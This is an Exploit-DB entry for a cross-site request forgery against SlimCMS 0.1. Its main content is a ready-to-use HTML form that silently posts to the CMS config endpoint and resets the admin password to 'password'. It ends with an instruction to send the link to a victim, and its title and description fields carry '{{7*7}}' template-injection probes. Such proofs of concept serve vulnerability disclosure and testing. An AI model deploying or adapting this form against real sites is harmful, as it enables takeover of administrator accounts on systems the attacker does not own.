SlimCMS 0.1 - Cross-Site Request Forgery (Change Admin Password)

EDB-ID:

39964

CVE:

N/A




Platform:

PHP

Date:

2016-06-16


<!--
# Exploit Title: CSRF Vulnerability on Slim CMS v0.1
# CMS Link: https://github.com/revuls/SlimCMS/releases
# Date: 16th June'2016
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://www.slimcms.nl/
# Software Link: https://github.com/revuls/SlimCMS/releases
# Version: Slim CMSv0.1
# Tested on: Windows 10,  XAMPP
# Twitter: https://twitter.com/m_avinash143


CSRF : Cross-Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user's web browser to perform an unwanted action on a trusted site for which the user is currently authenticated.


Vulnerability Description : 
It is possible to change the password of the administrator and complete account can be take over using this.

Steps to Reproduce the same

1. Login into the account.
2. Navigate to http://localhost/SlimCMS/admin/config
3. Fill the details and intecept the request using BurpSuite

Request Intercepted
-------------------
-->

<html>
  <body>
    <form action="http://localhost/SlimCMS/api/config" method="POST">
      <input type="hidden" name="title" value="&#123;&#123;7&#42;7&#125;&#125;" />
      <input type="hidden" name="description" value="&#123;&#123;7&#42;7&#125;&#125;" />
      <input type="hidden" name="user" value="admin" />
      <input type="hidden" name="password" value="password" />
      <input type="hidden" name="theme" value="default" />
      <input type="hidden" name="url" value="http&#58;&#47;&#47;localhost&#47;SlimCMS" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

<!--
4. Send the link to victim and password will be changed for the admin user (Once the victim's clicks on the URL).
-->